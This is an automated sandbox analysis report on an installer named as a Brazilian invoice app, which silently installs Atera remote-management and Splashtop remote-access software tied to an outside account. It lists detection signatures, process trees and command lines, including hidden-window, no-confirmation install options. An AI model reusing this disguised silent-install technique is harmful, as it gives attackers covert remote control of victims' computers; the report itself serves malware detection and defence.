Windows Analysis Report
APLICATIVO-WINDOWS-NOTA-FISCAL.msi

Overview

General Information

Sample name: APLICATIVO-WINDOWS-NOTA-FISCAL.msi
Analysis ID: 1584760
MD5: 7ce6669643890d209540d68e76c0cfcc
SHA1: c49df2e823d5e2461a11c96ad4d36974c7fffc9a
SHA256: 27f1cdf3422c4c87d9d273a62df4404339119e416d16d8512479d87acd07c12b
Tags: msi, user-Porcupine

Detection

AteraAgent
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Installs Task Scheduler Managed Wrapper
Loading BitLocker PowerShell Module
Queries disk data (e.g. SMART data)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, MSSMBios_RawSMBiosTables, often done to detect sandboxes)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Potential PowerShell Command Line Obfuscation
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • msiexec.exe (PID: 7644 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\APLICATIVO-WINDOWS-NOTA-FISCAL.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7688 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7764 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822D MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 7800 cmdline: rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7856 cmdline: rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7948 cmdline: rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 7452 cmdline: rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 8004 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 8044 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 8052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 8084 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 8116 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AteraAgent.exe (PID: 8184 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 4556 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 6044 cmdline: rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
  • AteraAgent.exe (PID: 3652 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 4908 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MpCmdRun.exe (PID: 8096 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7344 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 7292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 3084 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7248 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 7700 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ MD5: 9D8D50D2789C2A8D847D7953518A96F6)
      • conhost.exe (PID: 7352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7668 cmdline: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible " MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6912 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 416 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 7568 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ MD5: 67FEF41237025021CD4F792E8C24E95A)
      • conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SplashtopStreamer.exe (PID: 7000 cmdline: "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: 9CD6BA3AD27DAC967F073CBCAD88FEF9)
    • AgentPackageMonitoring.exe (PID: 8096 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "69e8737b-1308-4d43-800a-39f09304f118" agent-api.atera.com/Production 443 or8ixLi90Mf "syncprofile" 001Q300000P2oAPIAZ MD5: 810F893E58861909B134FA72E3BC90CD)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 3492 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 3992 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageUpgradeAgent.exe (PID: 8020 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ MD5: E9794F785780945D2DDE78520B9BB59F)
      • conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 1900 cmdline: "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart MD5: E5DA170027542E25EDE42FC54C929077)
    • AgentPackageTicketing.exe (PID: 5768 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ MD5: 2EC1D28706B9713026E8C6814E231D7C)
      • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageInternalPoller.exe (PID: 1784 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ MD5: 01807774F043028EC29982A62FA75941)
      • conhost.exe (PID: 1464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageProgramManagement.exe (PID: 3248 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ MD5: CB9890B01A396F64D702AD10F441003A)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageSystemTools.exe (PID: 1696 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ MD5: 5BB0687E2384644EA48F688D7E75377B)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageMonitoring.exe (PID: 4048 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ MD5: 810F893E58861909B134FA72E3BC90CD)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • sppsvc.exe (PID: 2792 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 396 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • AgentPackageUpgradeAgent.exe (PID: 1340 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun MD5: E9794F785780945D2DDE78520B9BB59F)
    • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DFB6CCB0CC037A0B87.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
0000002A.00000002.2783908899.000002203A1E0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000001D.00000002.2395847450.00000281D69E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000D.00000002.2294249455.0000021C41ED0000.00000004.00000020.00040000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000001A.00000002.2900108892.00000216491EB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
44.0.AgentPackageTicketing.exe.214714d0000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
21.2.AgentPackageAgentInformation.exe.15e7d2e0000.1.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
47.0.AgentPackageInternalPoller.exe.22b81dc0000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
49.2.AgentPackageProgramManagement.exe.153fd170000.3.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
20.0.AgentPackageAgentInformation.exe.2156b880000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

System Summary

Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible ", CommandLine: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) {
Source: Process started, Author: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6912, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 416, ProcessName: cscript.exe
Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8004, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8044, ProcessName: net.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible ", CommandLine: "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) {
Source: Process started, Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 8004, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 8044, ProcessName: net.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 396, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

                                Source: 692c48.rbf (copy)ReversingLabs: Detection: 26%
                                Source: 692c48.rbf (copy)Virustotal: Detection: 27%Perma Link
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeReversingLabs: Detection: 26%
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiVirustotal: Detection: 18%Perma Link
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiReversingLabs: Detection: 23%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
